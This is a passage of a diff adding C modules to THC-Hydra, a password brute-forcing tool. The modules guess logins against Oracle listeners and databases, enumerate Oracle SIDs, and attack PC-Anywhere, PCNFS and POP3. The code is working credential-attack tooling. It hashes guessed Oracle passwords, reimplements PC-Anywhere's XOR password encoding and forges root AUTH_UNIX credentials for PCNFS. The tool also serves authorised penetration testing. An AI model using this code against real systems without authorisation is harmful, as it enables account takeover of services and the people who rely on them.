0; +} + +int ora_hash_password(char *pass) { + // secret hash function comes here, and written to char *hash + int siz = 0; + unsigned char *desresult; + unsigned char *result; + char buff[strlen(pass) + 5]; + + memset(buff, 0, sizeof(buff)); + + //concatenate Arb string and convert the resulting string to uppercase + snprintf(buff, sizeof(buff), "Arb%s", pass); + strupper(buff); + + if (initial_permutation(&result, buff, &siz)) { + hydra_report(stderr, "[ERROR] ora_hash_password: in initial_permutation\n"); + return 1; + } + + if (convert_byteorder(&result, siz)) { + hydra_report(stderr, "[ERROR] ora_hash_password: in convert_byteorder\n"); + return 1; + } + if (ora_descrypt(&desresult, result, siz)) { + hydra_report(stderr, "[ERROR] ora_hash_password: in DES crypt\n"); + return 1; + } + free(result); + if (ora_hash(&result, desresult, siz)) { + hydra_report(stderr, "[ERROR] ora_hash_password: in extracting Oracle hash\n"); + return 1; + } + + memcpy(hash, result, HASHSIZE); + free(desresult); + free(result); + + return 0; +} + +int start_oracle_listener(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + unsigned char tns_packet_begin[22] = { + "\x00\x00\x01\x00\x00\x00\x01\x36\x01\x2c\x00\x00\x08\x00\x7f\xff\x86\x0e\x00\x00\x01\x00" + }; + unsigned char tns_packet_end[32] = { + "\x00\x3a\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x09\x94\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00" + }; + + char *empty = ""; + char *pass; + char connect_string[200]; + char buffer2[260]; + int siz = 0; + + memset(connect_string, 0, sizeof(connect_string)); + memset(buffer2, 0, sizeof(buffer2)); + + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + if (sid_mechanism == AUTH_PLAIN) { + if ((hash = malloc(HASHSIZE)) == NULL) { + hydra_report(stderr, "[ERROR] Can't allocate memory\n"); + return 1; + } + memset(hash, 0, HASHSIZE); + if (ora_hash_password(pass)) { + hydra_report(stderr, "[ERROR] generating Oracle hash\n"); + free(hash); + return 1; + } + pass = (char *) hash; + } + snprintf(connect_string, sizeof(connect_string), "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=))(COMMAND=reload)(PASSWORD=%s)(SERVICE=)(VERSION=169869568)))", pass); + + if (hash != NULL) + free(hash); + if (verbose) + hydra_report(stderr, "[VERBOSE] using connectiong string: %s\n", connect_string); + + siz = 2 + sizeof(tns_packet_begin) + 2 + sizeof(tns_packet_end) + strlen(connect_string); + if (siz > 255) { + buffer2[0] = 1; + buffer2[1] = siz - 256; + } else { + buffer2[1] = siz; + } + memcpy(buffer2 + 2, (char *) tns_packet_begin, sizeof(tns_packet_begin)); + siz = strlen(connect_string); + if (siz > 255) { + buffer2[2 + sizeof(tns_packet_begin)] = 1; + buffer2[1 + 2 + sizeof(tns_packet_begin)] = siz - 256; + } else { + buffer2[1 + 2 + sizeof(tns_packet_begin)] = siz; + } + memcpy(buffer2 + 2 + sizeof(tns_packet_begin) + 2, (char *) tns_packet_end, sizeof(tns_packet_end)); + memcpy(buffer2 + 2 + sizeof(tns_packet_begin) + 2 + sizeof(tns_packet_end), connect_string, strlen(connect_string)); + if (hydra_send(s, buffer2, 2 + sizeof(tns_packet_begin) + 2 + sizeof(tns_packet_end) + strlen(connect_string), 0) < 0) { + return 1; + } + + if ((buf = hydra_receive_line(s)) == NULL) + return 1; + if (verbose || debug) + hydra_report(stderr, "[VERBOSE] Server answer: %s\n", buf); + + if (strstr(buf, "ERR=0") != NULL) { + hydra_report_found_host(port, ip, "oracle-listener", fp); + hydra_completed_pair_found(); + } else + hydra_completed_pair(); + + free(buf); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; +} + +void service_oracle_listener(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + int myport = PORT_ORACLE, mysslport = PORT_ORACLE_SSL; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + + if ((miscptr != NULL) && (strlen(miscptr) > 0)) { + strupper(miscptr); + if (strncmp(miscptr, "CLEAR", 5) == 0) + sid_mechanism = AUTH_CLEAR; + } + if (verbose) { + switch (sid_mechanism) { + case AUTH_CLEAR: + hydra_report(stderr, "[VERBOSE] using SID CLEAR mechanism\n"); + break; + case AUTH_PLAIN: + hydra_report(stderr, "[VERBOSE] using SID PLAIN mechanism\n"); + break; + } + } + + while (1) { + switch (run) { + case 1: /* connect and service init function */ + if (sock >= 0) + sock = hydra_disconnect(sock); +// usleep(300000); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = mysslport; + } + if (sock < 0) { + if (verbose || debug) + hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + /* run the cracking function */ + next_run = start_oracle_listener(sock, ip, port, options, miscptr, fp); + break; + case 3: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + return; + case 4: + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(2); + return; + default: + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(0); + } + run = next_run; + } +} + +int service_oracle_listener_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} + +#endif diff --git a/hydra-oracle-sid.c b/hydra-oracle-sid.c new file mode 100644 index 0000000..901ec86 --- /dev/null +++ b/hydra-oracle-sid.c @@ -0,0 +1,151 @@ + +/* +david: + +module used to check for a valid oracle SID +ORCL and XE are a good start, but you should +find a big list on the Internet + +*/ + +#include "hydra-mod.h" +#ifndef LIBOPENSSL +#include +void dummy_oracle_sid() { + printf("\n"); +} +#else +#include +#define HASHSIZE 16 + +extern char *HYDRA_EXIT; +char *buf; +unsigned char *hash; + + +int start_oracle_sid(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + /* + PP is the packet length + XX is the length of connect data + PP + tns_packet_begin + XX + tns_packet_end + */ + unsigned char tns_packet_begin[22] = { + "\x00\x00\x01\x00\x00\x00\x01\x36\x01\x2c\x00\x00\x08\x00\x7f\xff\x86\x0e\x00\x00\x01\x00" + }; + unsigned char tns_packet_end[32] = { + "\x00\x3a\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x09\x94\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00" + }; + char *empty = ""; + char *login; + char connect_string[200]; + char buffer2[260]; + int siz = 0; + + memset(connect_string, 0, sizeof(connect_string)); + memset(buffer2, 0, sizeof(buffer2)); + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + + snprintf(connect_string, sizeof(connect_string), "(DESCRIPTION=(CONNECT_DATA=(SID=%s)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=)))(ADDRESS=(PROTOCOL=tcp)(HOST=%s)(PORT=%d)))", login, + hydra_address2string(ip), port); + siz = 2 + sizeof(tns_packet_begin) + 2 + sizeof(tns_packet_end) + strlen(connect_string); + if (siz > 255) { + buffer2[0] = 1; + buffer2[1] = siz - 256; + } else { + buffer2[1] = siz; + } + memcpy(buffer2 + 2, (char *) tns_packet_begin, sizeof(tns_packet_begin)); + siz = strlen(connect_string); + if (siz > 255) { + buffer2[2 + sizeof(tns_packet_begin)] = 1; + buffer2[1 + 2 + sizeof(tns_packet_begin)] = siz - 256; + } else { + buffer2[1 + 2 + sizeof(tns_packet_begin)] = siz; + } + memcpy(buffer2 + 2 + sizeof(tns_packet_begin) + 2, (char *) tns_packet_end, sizeof(tns_packet_end)); + memcpy(buffer2 + 2 + sizeof(tns_packet_begin) + 2 + sizeof(tns_packet_end), connect_string, strlen(connect_string)); + if (hydra_send(s, buffer2, 2 + sizeof(tns_packet_begin) + 2 + sizeof(tns_packet_end) + strlen(connect_string), 0) < 0) { + return 1; + } + + if ((buf = hydra_receive_line(s)) == NULL) + return 1; + //if no error reported. it should be a resend packet type 00 08 00 00 0b 00 00 00, 4 is refuse + if ((strstr(buf, "ERR=") == NULL) && (buf[4] != 4)) { + hydra_report_found_host(port, ip, "oracle-sid", fp); + hydra_completed_pair_found(); + } else + hydra_completed_pair(); + + free(buf); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; +} + +void service_oracle_sid(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + int myport = PORT_ORACLE, mysslport = PORT_ORACLE_SSL; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + while (1) { + switch (run) { + case 1: /* connect and service init function */ + if (sock >= 0) + sock = hydra_disconnect(sock); +// usleep(300000); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = mysslport; + } + if (sock < 0) { + hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + /* run the cracking function */ + next_run = start_oracle_sid(sock, ip, port, options, miscptr, fp); + break; + case 3: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + return; + case 4: + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(2); + return; + default: + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(0); + } + run = next_run; + } +} + +int service_oracle_sid_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} + +#endif diff --git a/hydra-oracle.c b/hydra-oracle.c new file mode 100644 index 0000000..31dfdd9 --- /dev/null +++ b/hydra-oracle.c @@ -0,0 +1,191 @@ + +/* + +david: code is based on SNORT spo_database.c + +tested with : +-instantclient_10_2 on Oracle 10.2.0 +-instantclient-basic-linux.*-11.2.0.3.0.zip + instantclient-sdk-linux.*-11.2.0.3.0.zip +on Oracle 9i and on Oracle 11g + +*/ + +#include "hydra-mod.h" + +#ifndef LIBORACLE + +void dummy_oracle() { + printf("\n"); +} + +#else + +#include +#include + +extern char *HYDRA_EXIT; + +OCIEnv *o_environment; +OCISvcCtx *o_servicecontext; +OCIBind *o_bind; +OCIError *o_error; +OCIStmt *o_statement; +OCIDefine *o_define; +text o_errormsg[512]; +sb4 o_errorcode; + +void print_oracle_error(char *err) { + if (verbose) { + OCIErrorGet(o_error, 1, NULL, &o_errorcode, o_errormsg, sizeof(o_errormsg), OCI_HTYPE_ERROR); + fprintf(stderr, "[ERROR] Oracle_error: %s - %s\n", o_errormsg, err); + } +} + +int start_oracle(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = ""; + char *login, *pass, buffer[200], sid[100]; + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + strncpy(sid, miscptr, sizeof(sid) - 1); + sid[sizeof(sid) - 1] = 0; + snprintf(buffer, sizeof(buffer), "//%s:%d/%s", hydra_address2string(ip), port, sid); + + /* + + To use the Easy Connect naming method, PHP must be linked with Oracle 10g or greater Client libraries. + The Easy Connect string for Oracle 10g is of the form: [//]host_name[:port][/service_name]. + With Oracle 11g, the syntax is: [//]host_name[:port][/service_name][:server_type][/instance_name]. + Service names can be found by running the Oracle utility lsnrctl status on the database server machine. + + The tnsnames.ora file can be in the Oracle Net search path, which includes $ORACLE_HOME/network/admin + and /etc. Alternatively set TNS_ADMIN so that $TNS_ADMIN/tnsnames.ora is read. Make sure the web + daemon has read access to the file. + + */ + + if (OCIInitialize(OCI_DEFAULT, NULL, NULL, NULL, NULL)) { + print_oracle_error("OCIInitialize"); + return 4; + } + if (OCIEnvInit(&o_environment, OCI_DEFAULT, 0, NULL)) { + print_oracle_error("OCIEnvInit"); + return 4; + } + if (OCIEnvInit(&o_environment, OCI_DEFAULT, 0, NULL)) { + print_oracle_error("OCIEnvInit 2"); + return 4; + } + if (OCIHandleAlloc(o_environment, (dvoid **) & o_error, OCI_HTYPE_ERROR, (size_t) 0, NULL)) { + print_oracle_error("OCIHandleAlloc"); + return 4; + } + + if (OCILogon(o_environment, o_error, &o_servicecontext, (const OraText *) login, strlen(login), (const OraText *) pass, strlen(pass), (const OraText *) buffer, strlen(buffer))) { + OCIErrorGet(o_error, 1, NULL, &o_errorcode, o_errormsg, sizeof(o_errormsg), OCI_HTYPE_ERROR); + //database: oracle_error: ORA-01017: invalid username/password; logon denied + //database: oracle_error: ORA-12514: TNS:listener does not currently know of service requested in connect descriptor + //database: oracle_error: ORA-28000: the account is locked + //Failed login attempts is set to 10 by default + if (verbose) { + hydra_report(stderr, "[VERBOSE] database: oracle_error: %s\n", o_errormsg); + } + if (strstr((const char *) o_errormsg, "ORA-12514") != NULL) { + hydra_report(stderr, "[ERROR] ORACLE SID is not valid, you should try to enumerate them.\n"); + } + if (strstr((const char *) o_errormsg, "ORA-28000") != NULL) { + hydra_report(stderr, "[ERROR] ORACLE account %s is locked.\n", login); + } + + if (o_error) { + OCIHandleFree((dvoid *) o_error, OCI_HTYPE_ERROR); + } + + hydra_completed_pair(); + //by default, set in sqlnet.ora, the trace file is generated in pwd to log any errors happening, + //as we don't care, we are deleting the file + //set these parameters to not generate the file + //LOG_DIRECTORY_CLIENT = /dev/null + //LOG_FILE_CLIENT = /dev/null + unlink("sqlnet.log"); + + return 2; + } else { + OCILogoff(o_servicecontext, o_error); + if (o_error) { + OCIHandleFree((dvoid *) o_error, OCI_HTYPE_ERROR); + } + hydra_report_found_host(port, ip, "oracle", fp); + hydra_completed_pair_found(); + } + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 1; +} + +void service_oracle(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + int myport = PORT_ORACLE; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + + if ((miscptr == NULL) || (strlen(miscptr) == 0)) { + //SID is required as miscptr + hydra_report(stderr, "[ERROR] Oracle SID is required, using ORCL as default\n"); + miscptr = "ORCL"; + } + + while (1) { + switch (run) { + case 1: /* connect and service init function */ + if (sock >= 0) + sock = hydra_disconnect(sock); + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + + if (sock < 0) { + if (verbose || debug) + hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + next_run = 2; + break; + case 2: + next_run = start_oracle(sock, ip, port, options, miscptr, fp); + hydra_child_exit(0); + break; + case 3: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + return; + default: + hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(2); + } + run = next_run; + } +} + +#endif + +int service_oracle_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-pcanywhere.c b/hydra-pcanywhere.c new file mode 100644 index 0000000..389311f --- /dev/null +++ b/hydra-pcanywhere.c @@ -0,0 +1,286 @@ +//This plugin was written by +// +//PC-Anywhere authentication protocol test on Symantec PC-Anywhere 10.5 +// +// no memleaks found on 110425 + +#include "hydra-mod.h" + +extern char *HYDRA_EXIT; + +int pcadebug = 0; + +int send_cstring(int s, char *crypted_string) { + char buffer2[100], *bptr = buffer2; + char clientcryptheader[] = "\x06"; + + memset(buffer2, 0, sizeof(clientcryptheader)); + bptr = buffer2; + buffer2[0] = 6; + bptr++; + buffer2[1] = strlen(crypted_string); + bptr++; + strcpy(bptr, crypted_string); + + return hydra_send(s, buffer2, 2 + strlen(crypted_string), 0); +} + +void show_buffer(char *buffer, int size) { + int i; + + printf("size: %d, buffer:\n", size); + for (i = 0; i < size; i++) { + printf("%c", buffer[i]); + } + printf("\n"); +} + +void clean_buffer(char *buf, int size) { + int i; + + for (i = 0; i < size; i++) { + int pos = buf[i]; + + if (pos < 32 || pos > 126) { + // . char + buf[i] = 46; + } + } +} + +void print_encrypted_str(char *str) { + int i; + + printf("encode string: "); + for (i = 0; i < strlen(str); i++) { + printf("%x ", str[i]); + } + printf("\n"); +} + +void pca_encrypt(char *cleartxt) { + char passwd[128]; + int i; + + strcpy(passwd, cleartxt); + if (strlen(cleartxt) > 0) { + passwd[0] = (passwd[0] ^ 0xab); + for (i = 1; i < strlen(passwd); i++) + passwd[i] = passwd[i - 1] ^ passwd[i] ^ (i - 1); + passwd[strlen(passwd)] = '\0'; + strcpy(cleartxt, passwd); + } + +} + +void pca_decrypt(char *password) { + char cleartext[128]; + int i; + + if (strlen(password) > 0) { + cleartext[0] = password[0] ^ 0xab; + for (i = 1; i < strlen(password); i++) + cleartext[i] = password[i - 1] ^ password[i] ^ (i - 1); + cleartext[strlen(password)] = '\0'; + strcpy(password, cleartext); + } +} + +void debugprintf(char *msg) { + if (pcadebug) + printf("debug: %s\n", msg); +} + +int start_pcanywhere(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = ""; + char *login, *pass; + char buffer[2048] = ""; + char clogin[128] = ""; + char cpass[128] = ""; + int ret, i; + + char *client[4]; + char *server[5]; + int clientsize[4]; + + client[0] = "\x00\x00\x00\x00"; + clientsize[0] = 4; + client[1] = "\x6F\x06\xff"; + clientsize[1] = 3; + client[2] = "\x6f\x61\x00\x09\x00\xfe\x00\x00\xff\xff\x00\x00\x00\x00"; + clientsize[2] = 14; + client[3] = "\x6f\x62\x01\x02\x00\x00\x00"; + clientsize[3] = 7; + + server[0] = "nter"; + server[1] = "\x1B\x61"; + server[2] = "\0x1B\0x62"; + server[3] = "Enter login name"; + server[4] = "denying connection"; + + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + debugprintf("dans pcanywhere start"); + + /*printf("testing %s:%s\n",login,pass); */ + + strcpy(clogin, login); + strcpy(cpass, pass); + + pca_encrypt(clogin); + pca_encrypt(cpass); + + for (i = 0; i < 4; i++) { + if (hydra_send(s, client[i], clientsize[i], 0) < 0) { + return 1; + } + + ret = hydra_recv(s, buffer, sizeof(buffer)); + if (ret == -1) { + return 1; + } + + if (i == 3) { + if (ret == 3) { + /*one more to get the login prompt */ + ret = hydra_recv(s, buffer, sizeof(buffer)); + } + } + + if (i == 0 || i == 3) + clean_buffer(buffer, ret); + + /*show_buffer(buffer,ret); */ + + if (i == 2) { + clean_buffer(buffer, ret); + if (strstr(buffer, server[i + 2]) != NULL) { + fprintf(stderr, "[ERROR] PC Anywhere host denying connection because you have requested a lower encrypt level\n"); + return 3; + } + } + + if (strstr(buffer, server[i]) == NULL) { + if (i == 3) { + debugprintf("problem receiving login banner"); + } + return 1; + } + } + + if (send_cstring(s, clogin) < 0) { + return 1; + } + ret = hydra_recv(s, buffer, sizeof(buffer)); + if (ret == -1) { + return 1; + } + clean_buffer(buffer, ret); + /*show_buffer(buffer,ret); */ + if (strstr(buffer, "Enter password:") == NULL) { + debugprintf("problem receiving password banner"); + return 1; + } + + if (send_cstring(s, cpass) < 0) { + return 1; + } + + ret = hydra_recv(s, buffer, sizeof(buffer)); + if (ret == -1) { + return 1; + } + + clean_buffer(buffer, ret); + /*show_buffer(buffer,ret); */ + + if ((strstr(buffer, "Invalid login") != NULL) || (strstr(buffer, "Enter password") != NULL)) { + debugprintf("login/passwd wrong"); + + hydra_completed_pair(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 2; + } else { + debugprintf("cool find login/passwd"); + + hydra_report_found_host(port, ip, "pcanywhere", fp); + hydra_completed_pair_found(); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + return 2; + } + return 1; +} + +void service_pcanywhere(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + int myport = PORT_PCANYWHERE, mysslport = PORT_PCANYWHERE_SSL; + + hydra_register_socket(sp); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + + while (1) { + + switch (run) { + case 1: /* connect and service init function */ + if (sock >= 0) + sock = hydra_disconnect(sock); + usleep(275000); + if ((options & OPTION_SSL) == 0) { + if (port != 0) + myport = port; + sock = hydra_connect_tcp(ip, myport); + port = myport; + } else { + if (port != 0) + mysslport = port; + sock = hydra_connect_ssl(ip, mysslport); + port = mysslport; + } + if (sock < 0) { + fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + + next_run = 2; + break; + + case 2: + + next_run = start_pcanywhere(sock, ip, port, options, miscptr, fp); + break; + case 3: + + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + return; + + default: + + fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(0); + } + run = next_run; + } +} + +int service_pcanywhere_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-pcnfs.c b/hydra-pcnfs.c new file mode 100644 index 0000000..413d1a1 --- /dev/null +++ b/hydra-pcnfs.c @@ -0,0 +1,198 @@ +#include "hydra-mod.h" + +/* pcnfs stuff copied from prout.c */ + +extern char *HYDRA_EXIT; +char *buf; + +#define LEN_HDR_RPC 24 +#define LEN_AUTH_UNIX 72+12 + +/* RPC common hdr */ +struct rpc_hdr { /* 24 */ + unsigned long xid; + unsigned long type_msg; + unsigned long version_rpc; + unsigned long prog_id; + unsigned long prog_ver; + unsigned long prog_proc; +}; + +struct pr_auth_args { + unsigned long len_clnt; + char name[64]; + unsigned long len_id; + char id[32]; + unsigned long len_passwd; + char passwd[64]; + unsigned long len_comments; + char comments[255]; +}; + +#define LEN_HDR_PCN_AUTH sizeof(struct pr_auth_args) + +/* Lets start ... */ + +int start_pcnfs(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) { + char *empty = ""; + char *login, *pass, buffer[LEN_HDR_RPC + LEN_AUTH_UNIX + LEN_HDR_PCN_AUTH]; + char *ptr, *pkt = buffer; + + unsigned long *authp; + struct timeval tv; + + struct rpc_hdr *rpch; + struct pr_auth_args *prh; + + if (strlen(login = hydra_get_next_login()) == 0) + login = empty; + if (strlen(pass = hydra_get_next_password()) == 0) + pass = empty; + + memset(pkt, 0, sizeof(buffer)); + + rpch = (struct rpc_hdr *) (pkt); + authp = (unsigned long *) (pkt + LEN_HDR_RPC); + prh = (struct pr_auth_args *) (pkt + LEN_HDR_RPC + LEN_AUTH_UNIX); + + rpch->xid = htonl(0x32544843); + rpch->type_msg = htonl(0); + rpch->version_rpc = htonl(2); + rpch->prog_id = htonl(150001); + rpch->prog_ver = htonl(2); + rpch->prog_proc = htonl(13); /* PCNFSD_PROC_PRAUTH */ + prh->len_clnt = htonl(63); + prh->len_id = htonl(31); + prh->len_passwd = htonl(63); + prh->len_comments = htonl(254); + + strcpy(prh->comments, " Hydra - THC password cracker - visit http://www.thc.org - use only allowed for legal purposes "); + strcpy(prh->name, "localhost"); + + ptr = prh->id; + while (*login) { + *ptr++ = (*login ^ 0x5b) & 0x7f; + login++; + } + *ptr = 0; + ptr = prh->passwd; + while (*pass) { + *ptr++ = (*pass ^ 0x5b) & 0x7f; + pass++; + } + *ptr = 0; + + gettimeofday(&tv, (struct timezone *) NULL); + *(authp) = htonl(1); /* auth unix */ + *(++authp) = htonl(LEN_AUTH_UNIX - 16); /* length auth */ + *(++authp) = htonl(tv.tv_sec); /* local time */ + *(++authp) = htonl(9); /* length host */ + strcpy((char *) ++authp, "localhost"); /* hostname */ + authp += (3); /* len(host)%4 */ + *(authp) = htonl(0); /* uid root */ + *(++authp) = htonl(0); /* gid root */ + *(++authp) = htonl(9); /* 9 gid grps */ + /* group root, bin, daemon, sys, adm, disk, wheel, floppy, "user gid" */ + *(++authp) = htonl(0); + *(++authp) = htonl(1); + *(++authp) = htonl(2); + *(++authp) = htonl(3); + *(++authp) = htonl(4); + *(++authp) = htonl(6); + *(++authp) = htonl(10); + *(++authp) = htonl(11); + *(++authp) = htonl(0); + + if (hydra_send(s, buffer, sizeof(buffer), 0) < 0) { + fprintf(stderr, "[ERROR] Could not send data to remote server, reconnecting ...\n"); + return 1; + } + + if ((buf = hydra_receive_line(s)) == NULL) { + fprintf(stderr, "[ERROR] Timeout from remote server, reconnecting ...\n"); + return 1; + } + +/* analyze the output */ + if (buf[2] != 'g' || buf[5] != 32) { + fprintf(stderr, "[ERROR] RPC answer status : bad proc/version/auth\n"); + free(buf); + return 3; + } + + if (buf[27] == 32 && buf[28] == 32 && buf[29] == 32) { + hydra_report_found_host(port, ip, "pcnfs", fp); + hydra_completed_pair_found(); + free(buf); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + } else { + hydra_completed_pair(); + free(buf); + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return 3; + } + + return 1; +} + +void service_pcnfs(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + int run = 1, next_run = 1, sock = -1; + + hydra_register_socket(sp); + if (port == 0) { + fprintf(stderr, "[ERROR] pcnfs module called without -s port!\n"); + hydra_child_exit(0); + } + if ((options & OPTION_SSL) != 0) { + fprintf(stderr, "[ERROR] pcnfs module can not be used with SSL!\n"); + hydra_child_exit(0); + } + + if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) + return; + + while (1) { + next_run = 0; + switch (run) { + case 1: /* connect and service init function */ + { + if (sock >= 0) + sock = hydra_disconnect(sock); +// usleep(275000); + if ((sock = hydra_connect_udp(ip, port)) < 0) { + fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid()); + hydra_child_exit(1); + } + next_run = 2; + break; + } + case 2: /* run the cracking function */ + next_run = start_pcnfs(sock, ip, port, options, miscptr, fp); + break; + case 3: /* clean exit */ + if (sock >= 0) + sock = hydra_disconnect(sock); + hydra_child_exit(0); + return; + default: + fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n"); + hydra_child_exit(0); + } + run = next_run; + } +} + +int service_pcnfs_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) { + // called before the childrens are forked off, so this is the function + // which should be filled if initial connections and service setup has to be + // performed once only. + // + // fill if needed. + // + // return codes: + // 0 all OK + // -1 error, hydra will exit, so print a good error message here + + return 0; +} diff --git a/hydra-pop3.c b/hydra-pop3.c new file mode 100644 index 0000000..df94272 --- /dev/null +++ b/hydra-pop3.c @@ -0,0 +1,771 @@ +#include "hydra-mod.h" +#include "sasl.h" + +//openssl s_client -starttls pop3 -crlf -connect 192.168.0.10:110 + +typedef struct pool_str { + char ip[36]; + + /* int port;*/// not needed + int pop3_auth_mechanism; + int disable_tls; + struct pool_str *next; +} pool; + +extern char *HYDRA_EXIT; +char *buf; +char apop_challenge[300] = ""; +pool *plist = NULL, *p = NULL; + +/* functions */ +int service_pop3_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port); + +pool *list_create(pool data) { + pool *p; + + if (!(p = malloc(sizeof(pool)))) + return NULL; + + memcpy(p->ip, data.ip, 36); + //p->port = data.port; + p->pop3_auth_mechanism = data.pop3_auth_mechanism; + p->disable_tls = data.disable_tls; + p->next = NULL; + + return p; +} + +pool *list_insert(pool data) { + pool *newnode; + + newnode = list_create(data); + newnode->next = plist; + plist = newnode->next; // to be sure! + + return newnode; +} + +pool *list_find(char *ip) { + pool *node = plist; + + while (node != NULL) { + if (memcmp(node->ip, ip, 36) == 0) + return node; + node = node->next; + } + + return NULL; +} + +/* how to know when to release the mem ? + -> well, after _start has determined which pool number it is */ +int list_remove(pool * node) { + pool *save, *list = plist; + int ok = -1; + + if (list == NULL || node == NULL) + return -2; + + do { + save = list->next; + if (list != node) + free(list); + else + ok = 0; + list = save; + } while (list != NULL); + + return ok; +} + +char *pop3_read_server_capacity(int sock) { + char *ptr = NULL; + int resp = 0; + char *buf = NULL; + + do { + if (buf != NULL) + free(buf); + ptr = buf = hydra_receive_line(sock); + if (buf != NULL) { + +/* +exchange capa: + ++OK +UIDL +STLS + +*/ + if (strstr(buf, "\r\n.\r\n") != NULL && buf[0] == '+') { + resp = 1; + /* we got the capability info then get the completed warning info from server */ + while (hydra_data_ready(sock)) { + free(buf); + buf = 